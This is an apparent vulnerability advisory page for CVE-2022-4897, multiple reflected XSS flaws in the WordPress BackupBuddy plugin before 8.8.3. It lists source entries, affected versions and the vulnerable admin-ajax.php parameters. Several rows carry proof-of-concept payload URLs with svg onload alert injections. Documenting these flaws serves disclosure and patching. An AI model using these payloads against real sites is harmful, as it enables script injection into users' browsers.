| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2022-4897 | 21 Feb 2023 12:21 | – | circl |
| WordPress plugin BackupBuddy cross-site scripting vulnerability | 21 Feb 2023 00:00 | – | cnnvd |
| CVE-2022-4897 BackupBuddy < 8.8.3 - Multiple Reflected Cross-Site Scripting | 21 Feb 2023 08:50 | – | cvelist |
| EUVD-2022-52154 | 21 Feb 2023 08:50 | – | euvd |
| WordPress BackupBuddy <8.8.3 - Cross Site Scripting | 28 Jun 2026 03:02 | – | nuclei |
| CVE-2022-4897 | 21 Feb 2023 09:15 | – | nvd |
| CVE-2022-4897 | 21 Feb 2023 09:15 | – | osv |
| WordPress BackupBuddy Plugin < 8.8.3 is vulnerable to Cross Site Scripting (XSS) | 31 Jan 2023 00:00 | – | patchstack |
| Cross site scripting | 21 Feb 2023 09:15 | – | prion |
| PT-2023-15907 · WordPress · Backupbuddy | 21 Feb 2023 00:00 | – | ptsecurity |

```json
[
  {
    "vendor": "Unknown",
    "product": "BackupBuddy",
    "versions": [
      {
        "status": "affected",
        "versionType": "custom",
        "version": "0",
        "lessThan": "8.8.3"
      }
    ],
    "defaultStatus": "unaffected"
  }
]
```

| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| step | request body | `wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=migrate_status` | Reflected XSS via unsanitized step parameter in migrate_status function | CWE-79 |
| file | request body | `wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=remote_send` | Reflected XSS via unsanitized file parameter in remote_send function | CWE-79 |
| archive | query param | `wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=restore_file_view&archive=--!><svg/onload=alert(/XSS/)>-` | Reflected XSS via archive parameter in restore_file_view | CWE-79 |
| file | query param | `wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=restore_file_view&file=--!><svg/onload=alert(/XSS/)>-` | Reflected XSS via file parameter in restore_file_view | CWE-79 |
| serial | query param | `wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=view_log&serial="><svg/onload=alert(/XSS/)>` | Reflected XSS via serial parameter in view_log | CWE-79 |
| add | query param | `wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=</script><svg/onload=alert(/XSS/)>` | Reflected XSS via destination_picker parameters (add, filter, callback_data) | CWE-79 |
| filter | query param | `wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=</script><svg/onload=alert(/XSS/)>` | Reflected XSS via destination_picker parameters (add, filter, callback_data) | CWE-79 |
| callback_data | query param | `wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=</script><svg/onload=alert(/XSS/)>` | Reflected XSS via destination_picker parameters (add, filter, callback_data) | CWE-79 |
| sending | query param | `wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&sending=%3C/script%3E%3Csvg/onload=alert(/XSS/)%3E` | Reflected XSS via sending parameter in destination_picker | CWE-79 |